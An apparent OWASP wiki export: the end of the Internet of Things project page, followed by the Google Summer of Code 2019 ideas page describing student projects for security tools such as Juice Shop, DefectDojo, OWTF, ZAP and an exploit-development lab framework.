Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of the billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer or manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, as well as many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=GSoC2019_Ideas&diff=249758GSoC2019 Ideas2019-04-05T20:21:49Z<p>Aaron.guzman: /* Idea 1: Insecure firmware web application ecosystem */</p>
<hr />
<div>=OWASP Project Requests=<br />
<br />
'''Tips to get you started in no particular order:''' <br />
* Read about the [https://developers.google.com/open-source/gsoc/ Google Summer of Code Program (GSoC)]<br />
* Read the [[GSoC SAT]]<br />
* Read the [https://www.owasp.org/index.php/GSoC GSOC Student Guidelines]<br />
* Contact us through the mailing list or IRC channel.<br />
* Check our [https://github.com/OWASP github organization]<br />
<br />
<br />
==OWASP-SKF==<br />
<br />
=== Idea 1: Improving the Machine Learning chatbot ===<br />
We want to extend the functionality of the SKF Bot (Security Knowledge Framework Chatbot).<br />
<br />
Suggested improvements to its functionality include:<br />
<br />
# Create a desktop version of the chatbot that people can install from a setup file on their local machine.<br />
# Create a plugin or website bot that can be embedded in the website for a better chat experience for the user.<br />
# Extend the bot's capability to do a Google search (using web scraping) for things that are not available in the database, so that it has a wider scope of knowledge.<br />
# Add a basic conversation flow that makes the SKF Bot friendly and provides a better user experience, for example replies to general queries like "How are you?" or "What is your name?".<br />
# Extend the bot's capability to reply with which security controls should be followed from the ASVS, MASVS or other custom checklists present in SKF.<br />
# Extend the bot to different platforms like Facebook, Telegram, Slack, Google Assistant etc.<br />
<br />
The existing chatbot implementation runs on Gitter. You can test the bot by typing @skfchatbot in the Gitter community.<br />
<br />
'''Getting started:'''<br />
<br />
* Get familiar with the architecture and code base of SKF (Security Knowledge Framework)<br />
* Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
* Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
<br />
* Python 3+, Flask, CoffeeScript<br />
<br />
'''Mentors and Leaders'''<br />
<br />
Glenn ten Cate (Mentor, Project leader)<br />
<br />
Riccardo ten Cate (Mentor, Project leader)<br />
<br />
Priyanka Jain (Mentor)<br />
<br />
=== Idea 2: Improving and building Lab challenges and write-ups ===<br />
Build lab examples and write-ups (how to test) for different vulnerabilities over different technology stacks. These challenges are to be delivered in Docker so they can be easily deployed.<br />
<br />
In the current situation the Security Knowledge Framework ultimately presents a list of security controls with correlating knowledge base items that contain a description and a solution. The new labs give software developers and application security specialists a more in-depth understanding of, and approach to, how to test for the vulnerabilities in their own code.<br />
* For example, we currently have around 20 lab challenges in Docker containers built in Python:<br />
** A Local File Inclusion Docker app example:<br />
*** https://github.com/blabla1337/skf-labs/tree/master/LFI<br />
** A write-up example:<br />
*** https://owasp-skf.gitbook.io/asvs-write-ups/filename-injection<br />
The images that are pushed to the GitHub repository are automatically built and pushed to a Docker registry, from which SKF users can easily pull them to get their labs running. Of course they can also download and build the images themselves from source by pulling the original repository.<br />
<br />
=== Idea 3: Addition of exploitation framework + labs + challenges and write-ups ===<br />
The proposal for SKF (Security Knowledge Framework) involves the addition of an “Exploit Development Framework”. The idea revolves around how one starts with Linux exploit development, from basic format string attacks to advanced buffer overflows.<br />
<br />
The idea is to develop an add-on (framework) that integrates with SKF and gives you hands-on experience writing exploit code against targets deployed in containers, using Docker for easy and instant deployment.<br />
<br />
The framework will provide a browser-based environment (shell) and a built-in chat utility that guides you from an absolute beginner with gdb basics all the way to bypassing protections like ASLR/NX/canaries in a Linux environment.<br />
<br />
Each challenge will have a dedicated container, which makes the various challenges easy to maintain. It will also give you the option to connect to the binary running on a particular port from your own machine, along with the source of the vulnerable code. This gives the user the flexibility to experiment and even automate the attacks in Python via socket programs or an intermediate framework like pwntools.<br />
<br />
The challenges are not limited to stack-based buffer overflows, but include format string attacks, double frees, heap overflows and privilege escalations.<br />
<br />
In total 20 challenges will be deployed. The idea is not limited to exploit development but also covers trying out some very advanced exploitation techniques like blind ROP, with lots of room for experimentation.<br />
<br />
The whole add-on also comes with dedicated documentation describing well-written ways to exploit the challenges in various flavours: manual, automated and advanced.<br />
<br />
Upon completion of the labs and write-ups, the NLP model can be trained to know not just web topics but also C/C++ coding best practices and the risks involved with calls like free() and puts(), and not only to explain the theory of why they are dangerous but also to guide you through why and how an exploit can be written from vulnerable code.<br />
<br />
Once the labs with ASLR turned off (non-ASLR stages) are completed, ASLR can be turned on, leading to ROP with ASLR and even more challenging questions.<br />
<br />
'''Mentors and Leaders''' <br />
<br />
Glenn ten Cate (Mentor, Project leader)<br />
<br />
Riccardo ten Cate (Mentor, Project leader)<br />
<br />
Priyanka Jain (Mentor, SKF Contributor)<br />
<br />
== OWASP DefectDojo ==<br />
OWASP DefectDojo is a popular open source vulnerability management tool and is used as the backbone for security programs. It is easy to get started working on! We welcome volunteers of all experience levels and are happy to provide mentorship.<br />
<br />
'''Issue Tracking:'''<br />
<br />
Enhancement [https://github.com/DefectDojo/django-DefectDojo/issues?q=is%3Aissue+is%3Aopen+label%3Aenhancement requests] and [https://github.com/DefectDojo/django-DefectDojo/issues?q=is%3Aissue+is%3Aopen+label%3Abug bugfixes] are located in GitHub issues. This project could implement a whole bunch of new features one by one and release them over the course of several small releases.<br />
<br />
'''Expected Results:'''<br />
* 5 or more new features or functional enhancements of significant scope for OWASP DefectDojo<br />
* Each feature comes with full functional unit and integration tests<br />
'''Getting started:'''<br />
* Get familiar with the architecture and code base of the application built on Django<br />
* Review the application functionality and familiarize yourself with Products, Engagements, Tests and Findings.<br />
* Get familiar with the CI/CD process based on Travis-CI<br />
'''Knowledge Prerequisites:'''<br />
* Python, Django, Javascript, Unit/Integration testing.<br />
'''Potential Mentors:'''<br />
* [mailto:aaron.weaver2+gsoc@gmail.com Aaron Weaver] - DefectDojo Project Leader<br />
* [mailto:greg.anderson@owasp.org Greg Anderson] - DefectDojo Project Leader<br />
* [mailto:matt.tesauro@owasp.org Matt Tesauro] - DefectDojo Project Leader<br />
'''Option 1: Unit Tests - Difficulty: Easy'''<br />
* If you're new to programming, unit tests are short scripts designed to test a specific function of an application.<br />
* The project needs additional unit tests to ensure that new code functions properly. <br />
* Review the current [https://github.com/DefectDojo/django-DefectDojo/tree/dev/dojo/unittests unit tests] <br />
* Complete Code Coverage Testing<br />
** Validate Tests exist for the following (create any that are missing):<br />
*** Finding, Test, Engagement, Reports, Endpoints <br />
*** Import from all scanners <br />
'''Option 2: Python3 Completion'''<br />
* DefectDojo is finishing up a migration to Python3<br />
* Test the current [https://github.com/DefectDojo/django-DefectDojo/tree/python3/dojo/unittests state] of Python3<br />
* Ensure all features work<br />
* Travis testing works correctly<br />
'''Option 3: Scan 2.0 / Launch Containers'''<br />
<br />
Scan 2.0 consists of automating the scanning orchestration within DefectDojo. Several proofs of concept exist for this using the AppSecPipeline to launch containers and then push those findings into the appropriate product.<br />
* Use the [https://github.com/appsecpipeline/AppSecPipeline-Specification AppSecPipeline] containers to build a scanning pipeline built on top of [https://www.openfaas.com/ OpenFaaS]<br />
* Scans should be able to be scheduled by DefectDojo and then invoked via the REST API call to OpenFaaS<br />
* Upon scan completion the results will be posted back to DefectDojo via DefectDojo's REST API and consumed as an engagement/test.<br />
* Pick 2 or 3 popular open source scanners such as NMAP, ZAP and Nikto to start out with.<br />
<br />
== OHP (OWASP Honeypot) ==<br />
<br />
[[OWASP_Python_Honeypot|OWASP Honeypot]] is open source software written in Python and designed for creating honeypots and honeynets in an easy and secure way! This project is compatible with Python 2.x and 3.x and tested on Windows, Mac OS X and Linux.<br />
<br />
=== Getting Started ===<br />
<br />
It's best to start from the [https://github.com/zdresearch/OWASP-Honeypot/wiki GitHub wiki page]; we are looking forward to adding more modules and optimizing the core.<br />
<br />
=== Technologies ===<br />
<br />
Currently we are using<br />
<br />
* Docker<br />
* Python<br />
* MongoDB<br />
* TShark<br />
* Flask<br />
* ChartJS<br />
* And more Linux services<br />
<br />
=== Expected Results ===<br />
<br />
* Zero Bugs: Currently we may have several bugs under different conditions, and it's best to test all functions and fix them<br />
* Monitoring: Right now monitoring is limited to the connections (send & receive); it's best to store and analyse the contents for further investigation and recognition of incoming attacks<br />
* Duplicated code: the engine code is complicated and duplicated, and should be fixed and cleaned up<br />
* New modules: add some creative ICS/Network/Web modules and vulnerable web applications, services and so on<br />
* API: update the API so it is in sync with all features<br />
* WebUI: Demonstrate and add the API on the WebUI and Live version with all features<br />
* WebUI Special Reports: Track the attacks more creatively and provide high-risk IPs<br />
* Database: Better database structure, faster, and using a queue<br />
* Data analysis: Analyse stored data and attack signatures<br />
* OWASP Top 10: Prepare useful processed/raw data for the OWASP Top 10 project<br />
<br />
=== Students Requirements ===<br />
<br />
* Python<br />
* Packet Analysis & Tshark & Libpcap<br />
* Docker<br />
* Database<br />
* Web Development Skills<br />
* Honeypot and Deception knowledge<br />
<br />
=== Mentors and Leaders ===<br />
<br />
* [mailto:ali.razmjoo@owasp.org Ali Razmjoo] (Mentor & Project Leader)<br />
* [mailto:ehsan@nezami.me Ehsan Nezami] (Mentor & Project Leader)<br />
* [mailto:reza.espargham@owasp.org Reza Espargham] (Mentor)<br />
* [mailto:abiusx@owasp.org Abbas Naderi] (Mentor)<br />
<br />
== OWASP Juice Shop ==<br />
<br />
[[OWASP Juice Shop Project]] is an intentionally insecure webapp for security training written entirely in Javascript which encompasses the entire OWASP Top Ten and other severe security flaws. Juice Shop is written in Node.js, Express and Angular. The application contains more than 30 challenges of varying difficulty where the user is supposed to exploit the underlying vulnerabilities. Apart from the hacker and awareness training use case, pentesting proxies or security scanners can use Juice Shop as a "guinea pig" application to check how well their tools cope with Javascript-heavy application frontends and REST APIs.<br />
The best way to get in touch with us is the '''community chat on https://gitter.im/bkimminich/juice-shop<nowiki/>.''' You can also send PMs to the potential mentors (@bkimminich, @J12934 and @CaptainFreak) there if you like!<br />
<br />
To receive early feedback please '''put your proposal on Google Docs and submit it to the OWASP Organization on Google's GSoC page''' in ''Draft Shared'' mode. Please pick '''''juice shop'' as Proposal Tag''' to make them easier to find for us. '''Thank you!'''<br />
<br />
=== Feature Pack 2019 ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
Ideas for potential new functionality and "business" features are collected in [https://github.com/bkimminich/juice-shop/issues?q=is%3Aissue+is%3Aopen+label%3Afeature GitHub issues labeled "feature"]. This project could implement a whole bunch of new features one by one and release them over the course of several small releases. This would allow the student to work in a professional Continuous Delivery kind of way while bringing benefit to the Juice Shop over the duration of the project.<br />
<br />
''Coming up with good additional ideas for features and new functionality in the proposal could make the difference between being selected or declined as a student for this project!''<br />
<br />
'''Expected Results:'''<br />
* 5 or more new features or functional enhancements of significant scope for OWASP Juice Shop (not necessarily including corresponding challenges)<br />
* Each feature comes with full functional unit and integration tests<br />
* Extending the functional walk-through chapter of the "Pwning OWASP Juice Shop" ebook<br />
* Code follows existing styleguides and passes all existing quality gates regarding code smells, test coverage etc.<br />
<br />
''' Getting started: '''<br />
* Get familiar with the architecture and code base of the application's rich Javascript frontend and RESTful backend<br />
* Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
* Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular and NodeJS/Express, security knowledge is optional.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Juice Shop Mobile ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
A complete mobile client for the Juice-Shop API which will serve a legit mobile experience for Juice-Shop users as well as a plethora of mobile app vulnerabilities and challenges around them to solve. In the best case it should translate the idea of Juice Shop's hacking challenges with a score board and success notifications into the mobile world.<br />
<br />
''Coming up with a sophisticated proposal (optimally even with a good initial sample implementation) could make the difference between being selected or declined as a student for this project!''<br />
<br />
''' Getting started '''<br />
* Get familiar with the architecture and code base of the application's RESTful backend<br />
* Get familiar with native app development<br />
* Get familiar with Mobile vulnerabilities<br />
<br />
'''Expected Results:'''<br />
* A mobile App with consistent UI/UX for Juice-Shop with standard client side vulnerabilities.<br />
* Sufficient initial release quality (on par with Juice Shop and Juice Shop CTF) to make it an official extension project hosted in its own GitHub repository ''bkimminich/juice-shop-mobile''<br />
* Code follows existing styleguides and applies similar quality gates regarding code smells, test coverage etc. as the main project.<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) React Native and NodeJS/Express, some Mobile security knowledge would be preferable.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Challenge Pack 2019 ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
Ideas for potential new hacking challenges are collected in [https://github.com/bkimminich/juice-shop/issues?q=is%3Aissue+is%3Aopen+label%3Achallenge GitHub issues labeled "challenge"]. This project could implement a whole bunch of challenges one by one and release them over the course of several small releases. This would allow the student to work in a professional Continuous Delivery kind of way while bringing benefit to the Juice Shop over the duration of the project.<br />
<br />
''Coming up with good additional ideas for challenges in the proposal could make the difference between being selected or declined as a student for this project!''<br />
<br />
'''Expected Results:'''<br />
* 10 or more new challenges for OWASP Juice Shop (including required functional enhancements to place the challenges)<br />
* Each challenge comes with full functional unit and integration tests<br />
* Each challenge is verified to be exploitable by corresponding end-to-end tests<br />
* Hint and solution sections for each new challenge are added to the "Pwning OWASP Juice Shop" ebook<br />
* Code follows existing styleguides and passes all existing quality gates regarding code smells, test coverage etc.<br />
<br />
''' Getting started: '''<br />
* Get familiar with the architecture and code base of the application's rich Javascript frontend and RESTful backend<br />
* Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
* Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular and NodeJS/Express, some security knowledge would be preferable.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Your idea ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
You have an awesome idea to improve OWASP Juice Shop that is not on this list? Great, please submit it!<br />
<br />
''' Getting started '''<br />
* Get in touch with [https://www.owasp.org/index.php/User:Bjoern_Kimminich Bjoern Kimminich]<br />
<br />
'''Expected Results:'''<br />
* A new feature that makes OWASP Juice Shop even better<br />
* Code follows existing styleguides and passes all existing quality gates regarding code smells, test coverage etc.<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular and NodeJS/Express, some security knowledge would be preferable.<br />
<br />
'''Mentors:''' <br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
<br />
==OWASP-Securetea Tools Project ==<br />
The OWASP SecureTea Project is an application designed to help secure a person's laptop, computer or server with IoT (Internet of Things) and to notify users (via various communication mechanisms) whenever someone accesses their computer or server. The application uses touchpad, mouse or wireless mouse activity to detect use; it is developed in Python and has been tested on various machines (Linux, Mac and Windows).<br />
The software is still under development and will eventually have its own IDS (Intrusion Detection System) / IPS (Intrusion Prevention System), firewall, anti-virus and intelligent log monitoring capabilities with web defacement detection, as well as support for many more communication media.<br />
https://github.com/OWASP/SecureTea-Project/blob/master/README.md<br />
<br />
===Brief Explanation===<br />
Do you have an idea to improve the SecureTea Project that is not on this list? We want this project to be useful to anyone who needs to secure their small IoT devices.<br />
<br />
===Idea===<br />
Choose from the roadmap and expected results below to improve the SecureTea Project.<br />
If you find any bugs, please help to fix them.<br />
<br />
===Roadmap=== <br />
See Our Roadmap<br><br />
https://github.com/OWASP/SecureTea-Project#roadmap<br><br />
<br />
===Expected Results===<br />
<br />
* SecureTea protection / firewall<br />
* SecureTea antivirus<br />
* Notify by WhatsApp<br />
* Notify by SMS alerts<br />
* Notify by Line<br />
* Notify by Telegram<br />
* Intelligent log monitoring, including web defacement detection<br />
* Detection of malicious devices<br />
* Login history<br />
=== Students Requirements ===<br />
<br />
* Python<br />
* Javascript <br />
* Angular and NodeJS/Express<br />
* Database<br />
* Linux<br />
<br />
=== Mentors === <br />
<br />
* [mailto:ade.putra@owasp.org Ade Yoseman Putra] - (OWASP Securetea Project Leader) <br><br />
* [mailto:rejah.rehim@owasp.org Rejah Rehim.A.A] - (OWASP Securetea Project Leader)<br />
<br><br />
<br />
==OWASP OWTF==<br />
'''[https://github.com/owtf/owtf Offensive Web Testing Framework (OWTF)]''' is a project focused on penetration testing efficiency and on aligning security tests with security standards like the OWASP Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST. Most of the ideas below focus on rewriting some major components of OWTF to make it more modular. OWTF is moving to a fresh codebase with a fully Docker-based testing and deployment environment. If you want a jumpstart, check out https://github.com/owtf/owtf/tree/new-arch.<br />
<br />
=== OWASP OWTF - Passive Online scanner improvements ===<br />
'''Brief Explanation'''<br />
<br />
OWTF supports many passive tests, such as those that use third-party websites (Google, Bing, etc. searches), as well as handy "Search for vulnerability" search boxes (e.g. the Fingerprinting plugin). This feature involves the creation of a '''script''' that produces an interactive OWTF report, with the intention of hosting it on the github.io site. The idea is to have a passive, JavaScript-only interactive report available on the owtf.github.io site, so that people can try OWTF '''without installing anything''', simply by visiting a URL.<br />
<br />
This would be a normal OWTF interactive report where the user can:<br />
* Enter a target<br />
* Try passive plugins (only the parts that use no tools)<br />
* Play with boilerplate templates from the OWTF interactive report<br />
An old version of the passive online scanner is hosted at https://owtf.github.io/online-passive-scanner.<br />
<br />
'''LEGAL CLARIFICATION (Just in case!)''': The passive online scanner simply makes OWTF passive testing '''through third party websites''' more accessible to anybody; however, it is the user who must 1) click the link manually, 2) do something bad with that afterwards, and 3) do 1 + 2 WITHOUT permission :). Therefore this passive online scanner does not do anything illegal. [http://www.slideshare.net/abrahamaranguren/legal-and-efficient-web-app-testing-without-permission More information about why this is not illegal here] (recommended reading!)<br />
<br />
For background on OWASP OWTF please see: https://www.owasp.org/index.php/OWASP_OWTF<br />
<br />
'''Expected results:'''<br />
* '''IMPORTANT: [http://legacy.python.org/dev/peps/pep-0008/ PEP-8 compliant code]/ES6 JavaScript code in all modified code and surrounding areas.'''<br />
* High performance<br />
* Reliability<br />
* Ease of use<br />
* Test cases<br />
* Good documentation<br />
<br />
'''Knowledge Prerequisite:'''<br />
<br />
A good knowledge of JavaScript and writing ES6 compliant React/TypeScript is needed. Previous exposure to security concepts and penetration testing is not required but recommended and some lack of this can be compensated with pre-GSoC involvement and will to learn.<br />
<br />
'''OWASP OWTF Mentors:''' Contact: [mailto:Abraham.Aranguren@owasp.org Abraham Aranguren], [mailto:viyat.bhalodia@owasp.org Viyat Bhalodia]<br />
<br />
===OWASP OWTF - MiTM proxy interception and replay capabilities===<br />
'''Brief Explanation:'''<br />
<br />
The OWTF man-in-the-middle proxy is written completely in Python (based on the excellent Tornado framework) and was benchmarked to be the fastest Python MiTM proxy. However, it lacks the useful and much-needed interception and replay capabilities of mitmproxy (https://github.com/mitmproxy/mitmproxy).<br />
<br />
The current implementation of the MiTM proxy serves its purpose very well. It is fast, but it is not extensible. There are a number of good use cases for extensibility:<br />
*ability to intercept the transactions<br />
*modify or replay transaction on the fly<br />
*add additional capabilities to the proxy (such as session marking/changing) without polluting the main proxy code<br />
Bonus:<br />
*Design and implement a proxy plugin (middleware) architecture so that the plugins can be defined separately and the user can choose what plugins to include dynamically (from the web interface).<br />
*Replace the current Requester (based on urllib, urllib2) with a more robust Requester based on the new urllib3, with support for a real headless browser factory. The typical flow when an authenticated browser instance (using PhantomJS) is requested:<br />
<br />
*The "Requester" module checks whether any login parameters are provided (i.e. form-based or script; look at https://github.com/owtf/login-sessions-plugin)<br />
*Create a browser instance and do the necessary login procedure<br />
*Handle the browser for the URI<br />
*When called to close the browser, do a clean logout and kill the browser instance.<br />
'''Expected results:'''<br />
*'''IMPORTANT: [http://legacy.python.org/dev/peps/pep-0008/ PEP-8 compliant code] in all modified code and surrounding areas.'''<br />
*'''IMPORTANT: [https://github.com/7a/owtf/wiki/Contributor%27s-README OWTF contributor README compliant code]'''<br />
*'''IMPORTANT: [http://sphinx-doc.org/ Sphinx-friendly python comments] [http://owtf.github.io/ptp/_modules/ptp/tools/w3af/parser.html#W3AFXMLParser example Sphinx-friendly python comments here]'''<br />
*CRITICAL: Excellent reliability<br />
*Good performance<br />
*Unit tests / Functional tests<br />
*Good documentation<br />
'''Knowledge Prerequisite:''' Python proficiency, some previous exposure to security concepts and penetration testing is welcome but not strictly necessary as long as there is will to learn.<br />
<br />
'''OWASP OWTF Mentors:''' Contact: [mailto:Abraham.Aranguren@owasp.org Abraham Aranguren], [mailto:viyat.bhalodia@owasp.org Viyat Bhalodia], [mailto:bharadwaj.machiraju@gmail.com Bharadwaj Machiraju] - OWASP OWTF Project Leaders<br />
===OWASP OWTF - Web interface enhancements===<br />
'''Brief explanation:'''<br />
<br />
The current web interface is a mixture of Tornado Jinja templates and ReactJS. A complete UI change to a stable ReactJS-based interface should be the deliverable for this project. Most of the hard part for the change has already been done and added in a separate branch at https://github.com/owtf/owtf/tree/develop.<br />
<br />
For background on OWASP OWTF please see: https://www.owasp.org/index.php/OWASP_OWTF<br />
<br />
'''Expected results:'''<br />
*'''IMPORTANT: Clean, maintainable (ES6 compatible and using recommended design patterns) React (JavaScript) code. ([https://github.com/getsentry/zeus/tree/master/webapp This] is a good example!)'''<br />
*'''IMPORTANT: Thoroughly documented code along with API examples and example future components.'''<br />
*'''CRITICAL''': Excellent reliability and performance.<br />
*Unit tests / Functional tests and easy to setup testing environment (preferably automated).<br />
'''Knowledge Prerequisite:''' Python (reading API source code and endpoints), React.JS (high proficiency) and general JavaScript proficiency.<br />
<br />
'''OWASP OWTF Mentors:''' Contact: [mailto:Abraham.Aranguren@owasp.org Abraham Aranguren], [mailto:viyat.bhalodia@owasp.org Viyat Bhalodia], [mailto:bharadwaj.machiraju@gmail.com Bharadwaj Machiraju] - OWASP OWTF Project Leaders<br />
===OWASP OWTF - New plugin architecture===<br />
'''Brief explanation:'''<br />
<br />
The current plugin system is not very useful, and it is painful to browse the many plugins. Most of the plugins contain a lot of code, and most of it is repeated; much refactoring is needed there.<br />
<br />
This issue is documented in detail at https://github.com/owtf/owtf/issues/905.<br />
<br />
For background on OWASP OWTF please see: https://www.owasp.org/index.php/OWASP_OWTF<br />
<br />
'''Expected results:'''<br />
*'''IMPORTANT: [http://legacy.python.org/dev/peps/pep-0008/ PEP-8 compliant code] in all modified code and surrounding areas.'''<br />
*'''IMPORTANT: [https://github.com/7a/owtf/wiki/Contributor%27s-README OWTF contributor README compliant code]'''<br />
*'''IMPORTANT: [http://sphinx-doc.org/ Sphinx-friendly python comments] [http://owtf.github.io/ptp/_modules/ptp/tools/w3af/parser.html#W3AFXMLParser example Sphinx-friendly python comments here]'''<br />
*CRITICAL: Excellent reliability<br />
*Good performance<br />
*Unit tests / Functional tests<br />
*Good documentation<br />
<br />
== OWASP iGoat (draft) ==<br />
'''Idea 1:''' Completing the OWASP iGoat documentation at https://docs.igoatapp.com/ and creating demo videos for the OWASP iGoat YouTube channel for learning purposes.<br />
<br />
'''Idea 2:''' Adding a new challenge pack / CTF for iGoat. It should be a one-stop solution for learning iOS app security.<br />
<br />
== OWASP Seraphimdroid ==<br />
[[OWASP SeraphimDroid Project|OWASP Seraphimdroid]] is an Android security and privacy app with features that enhance users' knowledge about security and privacy on their mobile devices. If you are interested in this project and in working on it during Google Summer of Code, please contact [[User:Nikola Milosevic|Nikola Milosevic]] and express your interest.<br />
<br />
=== Idea 1: Anomaly detection of device state ===<br />
The idea is that certain features of a device would be constantly monitored (battery use, internet usage, app calls, etc.). Initially, the usual behaviour of the device would be learned. Later, anomalies relative to that normal behaviour would be reported to the user. This should include some explanation, such as which applications are causing the anomalous device behaviour.<br />
<br />
=== Idea 2: On device machine learning of maliciousness of an app ===<br />
TensorFlow for on-device processing and some other libraries that enable on-device machine learning have been released. We have previously applied a system that, based on permissions, is able to distinguish malicious apps from non-malicious ones. Now we would also like to learn from other outputs and other things one can monitor about an application whether it may be malicious.<br />
<br />
=== Idea 3: Enhancing privacy features ===<br />
The vision of Seraphimdroid is to be aware of privacy threats. This may be achieved through knowing which applications are using user accounts or other information that the user has on the phone and sending it to a server, or just by knowing which applications may be doing so. The knowledge base should be extended with suggestions on how to improve privacy. Also, automated settings for various apps to use encryption should be proposed.<br />
==OWASP ZAP==<br />
The [[OWASP Zed Attack Proxy Project|OWASP Zed Attack Proxy]] (ZAP) is one of the world’s most popular free security tools and is actively maintained by hundreds of international volunteers. Previous GSoC students have implemented key parts of the ZAP core functionality and have been offered (and accepted) jobs based on their work on ZAP.<br />
<br />
=== Active Scanning WebSockets ===<br />
: '''Brief Explanation:'''<br />
: ZAP has good support for websockets, and allows them to be intercepted, changed and fuzzed. Unfortunately it doesn't currently support active scanning (automated attacking) of websocket traffic (messages).<br />
: We would like to add active scanning support to websockets, ideally in a generic way which would allow us to reuse as many of our existing rules as are relevant. Adding additional websocket specific attacks would also be very useful.<br />
: This project will be a continuation of the work that was started as part of last year's GSoC.<br />
: '''Expected Results:'''<br />
:* A pluggable infrastructure that allows us to actively scan websockets<br />
:* Converting the relevant existing scan rules to work with websockets<br />
:* Implementing new websocket specific scan rules<br />
